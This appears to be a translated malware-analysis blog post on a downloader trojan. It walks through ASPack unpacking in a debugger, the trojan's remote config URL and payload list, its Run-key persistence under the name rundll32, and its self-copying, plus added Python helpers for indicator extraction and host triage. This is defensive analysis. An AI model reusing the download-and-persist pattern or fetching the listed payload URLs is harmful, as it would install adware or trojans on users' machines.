Analysis of a downloader-type trojan
混世魔王 http://26836659.blogcn.com
ASPack 2.12 -> Alexey Solodovnikov
0041E001 > 60 PUSHAD //entry code
0041E002 E8 03000000 CALL randll32.0041E00A //F8 to here, then HR ESP (hardware breakpoint on ESP) and F9 to run
0041E007 – E9 EB045D45 JMP 459EE4F7
0041E00C 55 PUSH EBP
0041E00D C3 RETN
0041E3B0 /75 08 JNZ SHORT randll32.0041E3BA //F9 runs to here
0041E3B2 |B8 01000000 MOV EAX,1
0041E3B7 |C2 0C00 RETN 0C
0041E3BA \68 BC494100 PUSH randll32.004149BC //F8 down to here
0041E3BF C3 RETN
004149BC 55 PUSH EBP //OEP
004149BD 8BEC MOV EBP,ESP
004149BF B9 04000000 MOV ECX,4
004149C4 6A 00 PUSH 0
004149C6 6A 00 PUSH 0
004149C8 49 DEC ECX
Arrived at OEP=149BC; dump it out and fix the imports. Written in Delphi.
Reload the unpacked program in OD. The file is only 140-odd KB, very small; with the help of the string references I did a quick analysis.
00413F37 . 55 PUSH EBP
00413F38 . 68 6B414100 PUSH randll_.0041416B
00413F3D . 64:FF30 PUSH DWORD PTR FS:[EAX]
00413F40 . 64:8920 MOV DWORD PTR FS:[EAX],ESP
00413F43 . 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
00413F46 . BA B4414100 MOV EDX,randll_.004141B4 ;
http://www.yeacool.net/updatenew/updatetl.txt
After it runs, the program accesses this URL and reads the information from it.
00413F4B . E8 ECFDFEFF CALL randll_.00403D3C
00413F50 . 8D45 DC LEA EAX,DWORD PTR SS:[EBP-24]
00413F53 . E8 84070000 CALL randll_.004146DC
00413F58 . 8B55 DC MOV EDX,DWORD PTR SS:[EBP-24]
00413F5B . 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8]
00413F5E . B9 EC414100 MOV ECX,randll_.004141EC ;
update.ini
After reading it, the program generates an update.ini file to store the information it read.
00413F63 . E8 2400FFFF CALL randll_.00403F8C
00413F68 . 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]
00413F6B . E8 A032FFFF CALL randll_.00407210
00413F70 . 84C0 TEST AL,AL
00413F72 . 74 08 JE SHORT randll_.00413F7C
00413F74 . 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]
00413F77 . E8 A432FFFF CALL randll_.00407220
00413F7C > 8B55 F8 MOV EDX,DWORD PTR SS:[EBP-8]
00413F7F . 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00413F82 . E8 85070000 CALL randll_.0041470C
00413F87 . 84C0 TEST AL,AL
00413F89 . 75 0D JNZ SHORT randll_.00413F98
00413F8B . 33C0 XOR EAX,EAX
00413F8D . 5A POP EDX
00413F8E . 59 POP ECX
00413F8F . 59 POP ECX
00413F90 . 64:8910 MOV DWORD PTR FS:[EAX],EDX
00413F93 . E9 DD010000 JMP randll_.00414175
00413F98 > 8B4D F8 MOV ECX,DWORD PTR SS:[EBP-8]
00413F9B . B2 01 MOV DL,1
00413F9D . A1 B82B4100 MOV EAX,DWORD PTR DS:[412BB8]
00413FA2 . E8 C1ECFFFF CALL randll_.00412C68
00413FA7 . 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX
00413FAA . 6A 00 PUSH 0
00413FAC . 8D45 D8 LEA EAX,DWORD PTR SS:[EBP-28]
00413FAF . 50 PUSH EAX
00413FB0 . B9 00424100 MOV ECX,randll_.00414200 ; filelist
00413FB5 . BA 14424100 MOV EDX,randll_.00414214 ; settings
00413FBA . 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C]
00413FBD . 8B18 MOV EBX,DWORD PTR DS:[EAX]
00413FBF . FF13 CALL DWORD PTR DS:[EBX]
00413FC1 . 8B45 D8 MOV EAX,DWORD PTR SS:[EBP-28]
filelist and settings: a look at the contents of updatetl.txt makes these clear.
Contents of updatetl.txt:
[settings]
filelist=iplus0417.exe,0,1;wd2_051117_WIS207_mini.exe,0,1;all0417.exe,0,1;0112_9.exe,0,1;194026.exe,0,1;s28979.exe,0,1;Kuaiso.exe,0,1;01YYAZ01.exe,0,1;dsogou0415.exe,0,1;pcast207.exe,0,1;
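To make the filelist format concrete, here is an added parser (example code written for this write-up, not part of the sample or the original post) that takes the config text above and resolves each entry against the directory of the config URL, which the summary says is where the files are fetched from. The two trailing fields of each entry are kept as opaque flags because their meaning is not established in the analysis; entries that are not plain filenames are skipped so a path-traversal-looking entry never becomes an indicator.

```python
"""Parser for the downloader's updatetl.txt configuration.
Added example for this write-up, not the trojan's own code."""
import configparser
from dataclasses import dataclass
from typing import List
from urllib.parse import urljoin

# Constructed copy of the config shown in the analysis.
CONFIG_URL = "http://www.yeacool.net/updatenew/updatetl.txt"
SAMPLE_CONFIG = """[settings]
filelist=iplus0417.exe,0,1;wd2_051117_WIS207_mini.exe,0,1;all0417.exe,0,1;0112_9.exe,0,1;194026.exe,0,1;s28979.exe,0,1;Kuaiso.exe,0,1;01YYAZ01.exe,0,1;dsogou0415.exe,0,1;pcast207.exe,0,1;
"""


@dataclass(frozen=True)
class FileEntry:
    name: str
    flag_a: str  # meaning of the two trailing fields is not documented in the analysis
    flag_b: str
    url: str     # sibling of the config URL, per the summary


def parse_filelist(config_text: str, config_url: str) -> List[FileEntry]:
    """Split [settings] filelist into (name, flag, flag) triples and resolve download URLs."""
    parser = configparser.ConfigParser(interpolation=None)  # no '%' interpolation surprises
    parser.read_string(config_text)
    raw = parser.get("settings", "filelist", fallback="")
    entries = []
    for item in raw.split(";"):  # entries are ';'-separated with a trailing ';'
        item = item.strip()
        if not item:
            continue
        fields = [f.strip() for f in item.split(",")]
        name = fields[0]
        flag_a = fields[1] if len(fields) > 1 else ""
        flag_b = fields[2] if len(fields) > 2 else ""
        # Only bare filenames are sibling downloads; anything with a path component is skipped.
        if not name or "/" in name or "\\" in name or ".." in name:
            continue
        entries.append(FileEntry(name, flag_a, flag_b, urljoin(config_url, name)))
    return entries


def download_urls(config_text: str, config_url: str) -> List[str]:
    """Network indicators a defender would block or hunt for."""
    return [e.url for e in parse_filelist(config_text, config_url)]


if __name__ == "__main__":
    for entry in parse_filelist(SAMPLE_CONFIG, CONFIG_URL):
        print(entry.name, entry.flag_a, entry.flag_b, entry.url)
```

The URL list this produces is what you would feed into proxy or DNS blocklists; the parser deliberately ignores configparser's inline-comment handling (off by default) so the ';' separators inside the value survive.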
0041428B |. E8 C0F9FFFF CALL randll_.00413C50
00414290 |. 33C9 XOR ECX,ECX
00414292 |. BA E4424100 MOV EDX,randll_.004142E4 ;
\software\microsoft\windows\currentversion\run
Writes a registry Run (startup) entry.
00414297 |. 8BC3 MOV EAX,EBX
00414299 |. E8 16FAFFFF CALL randll_.00413CB4
0041429E |. 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4]
004142A1 |. BA 1C434100 MOV EDX,randll_.0041431C ;
rundll32
The value name is rundll32.
004142A6 |. 8BC3 MOV EAX,EBX
00414364 |. BA FC434100 MOV EDX,randll_.004143FC ;
rundll32.ini
00414369 |. E8 DAFBFEFF CALL randll_.00403F48
0041436E |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
00414371 |. B2 01 MOV DL,1
00414373 |. A1 B82B4100 MOV EAX,DWORD PTR DS:[412BB8]
00414378 |. E8 EBE8FFFF CALL randll_.00412C68
0041437D |. 8BD8 MOV EBX,EAX
0041437F |. 6A 00 PUSH 0
00414381 |. 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8]
00414384 |. 50 PUSH EAX
00414385 |. B9 14444100 MOV ECX,randll_.00414414 ; ASCII “hasdown”
0041438A |. BA 24444100 MOV EDX,randll_.00414424 ; ASCII “settings”
Saves it as rundll32.ini and writes the hasdown entry under the settings section.
00414681 |. 8BD8 MOV EBX,EAX
00414683 |. 68 FF000000 PUSH 0FF ; /BufSize = FF (255.)
00414688 |. 53 PUSH EBX ; |Buffer
00414689 |. E8 0A14FFFF CALL <JMP.&kernel32.GetSystemDirectoryA> ; \GetSystemDirectoryA
GetSystemDirectoryA gets the system directory.
004146EC |. 53 PUSH EBX ; /Buffer
004146ED |. 68 FF000000 PUSH 0FF ; |BufSize = FF (255.)
004146F2 |. E8 A913FFFF CALL <JMP.&kernel32.GetTempPathA> ; \GetTempPathA
The path obtained from GetTempPathA.
004147ED |. 68 C0484100 PUSH randll_.004148C0 ; /pModule = “kernel32”
004147F2 |. E8 7912FFFF CALL <JMP.&kernel32.GetModuleHandleA> ; \GetModuleHandleA
GetModuleHandleA gets the module handle of an application or DLL.
004147F7 |. 8985 F0FEFFFF MOV DWORD PTR SS:[EBP-110],EAX
004147FD |. 83BD F0FEFFFF>CMP DWORD PTR SS:[EBP-110],0
00414804 |. 74 47 JE SHORT randll_.0041484D
00414806 |. 68 CC484100 PUSH randll_.004148CC ; /ProcNameOrOrdinal = “ExitProcess” ExitProcess shuts down a process cleanly
0041480B |. 8B85 F0FEFFFF MOV EAX,DWORD PTR SS:[EBP-110] ; |
00414811 |. 50 PUSH EAX ; |hModule
00414812 |. E8 6912FFFF CALL <JMP.&kernel32.GetProcAddress> ; \GetProcAddress
00414817 |. 8985 F4FEFFFF MOV DWORD PTR SS:[EBP-10C],EAX
0041481D |. 68 D8484100 PUSH randll_.004148D8 ; /ProcNameOrOrdinal = “DeleteFileA” DeleteFileA deletes the specified file
00414822 |. 8B85 F0FEFFFF MOV EAX,DWORD PTR SS:[EBP-110] ; |
00414828 |. 50 PUSH EAX ; |hModule
00414829 |. E8 5212FFFF CALL <JMP.&kernel32.GetProcAddress> ; \GetProcAddress
0041482E |. 8985 ECFEFFFF MOV DWORD PTR SS:[EBP-114],EAX
00414834 |. 68 E4484100 PUSH randll_.004148E4 ; /ProcNameOrOrdinal = “UnmapViewOfFile”
00414839 |. 8B85 F0FEFFFF MOV EAX,DWORD PTR SS:[EBP-110] ; |
0041483F |. 50 PUSH EAX ; |hModule
00414840 |. E8 3B12FFFF CALL <JMP.&kernel32.GetProcAddress> ; \GetProcAddress
Summary:
A typical downloader: it reads its configuration from http://www.yeacool.net/updatenew/updatetl.txt and downloads iplus0417.exe, wd2_051117_WIS207_mini.exe, all0417.exe, 0112_9.exe and the rest from the same directory; these are adware or trojan programs.
The program writes itself into the registry Run key (\software\microsoft\windows\currentversion\run) under the value name rundll32. When run from a non-system directory it copies itself into the system directory and deletes the original program. A rundll32 process is visible in the process list.
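The persistence and file artifacts in the summary are what a responder checks on a suspect host. The following host-triage helpers are an added example (not code from the original post or from the sample) that works on data already collected from the machine: a mapping of Run-key value names to their commands, a listing of the system directory, and the text of any dropped ini file. It flags the exact value name this sample uses, and, going slightly beyond the write-up, any Run entry that launches a file named rundll32.exe from somewhere other than the real system directory. The file name randll32.exe in the constructed sample data is the module name seen in the debugger and is used only as a placeholder for whatever name the copied sample carries.

```python
"""Host triage for the persistence artifacts described in the analysis.
Added example for this write-up, not code from the original post or the sample."""
import configparser
import ntpath
from typing import Dict, Iterable, List

# Indicators taken from the analysis above.
RUN_KEY = r"software\microsoft\windows\currentversion\run"
RUN_VALUE_NAME = "rundll32"                      # value name the downloader registers itself under
INI_ARTIFACTS = ("rundll32.ini", "update.ini")   # files it drops while running


def _executable_of(command: str) -> str:
    """Return the program path from a Run-key command string, honouring a quoted path."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]


def _same_path(a: str, b: str) -> bool:
    """Case-insensitive Windows path comparison (ntpath works on any host)."""
    return ntpath.normcase(ntpath.normpath(a)) == ntpath.normcase(ntpath.normpath(b))


def check_run_entries(entries: Dict[str, str], system_dir: str) -> List[str]:
    """entries maps Run value names to command strings (e.g. as exported from RUN_KEY)."""
    findings = []
    real_rundll32 = ntpath.join(system_dir, "rundll32.exe")
    for name, command in entries.items():
        exe = _executable_of(command)
        if name.lower() == RUN_VALUE_NAME:
            findings.append(f"Run value '{name}' matches the downloader's persistence entry -> {command}")
        elif ntpath.basename(exe).lower() == "rundll32.exe" and not _same_path(exe, real_rundll32):
            findings.append(f"Run value '{name}' launches a rundll32.exe outside {system_dir} -> {command}")
    return findings


def check_ini_artifacts(system_dir: str, existing_files: Iterable[str]) -> List[str]:
    """Report which dropped ini files exist; existing_files is a directory listing of full paths."""
    present = []
    for artifact in INI_ARTIFACTS:
        wanted = ntpath.join(system_dir, artifact)
        if any(_same_path(wanted, f) for f in existing_files):
            present.append(wanted)
    return present


def has_hasdown_marker(ini_text: str) -> bool:
    """True if an ini body carries the [settings] hasdown entry the sample writes to rundll32.ini."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(ini_text)
    return parser.has_option("settings", "hasdown")


if __name__ == "__main__":
    # Constructed sample data; nothing here was read from a real host.
    system_dir = r"C:\WINDOWS\system32"
    run_entries = {
        "rundll32": r"C:\WINDOWS\system32\randll32.exe",       # placeholder name for the copied sample
        "ctfmon.exe": r"C:\WINDOWS\system32\ctfmon.exe",       # benign
        "Updater": r'"C:\Temp Files\rundll32.exe" /s',          # look-alike outside system32
    }
    for line in check_run_entries(run_entries, system_dir):
        print(line)
    print(check_ini_artifacts(system_dir, [r"C:\WINDOWS\System32\RUNDLL32.INI"]))
```

On a live Windows host the dictionary would come from enumerating the HKCU and HKLM Run keys (the write-up does not say which hive the sample uses, so check both), and the directory listing from the path GetSystemDirectoryA returns; the checks themselves are pure functions so they can be run offline against collected evidence.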
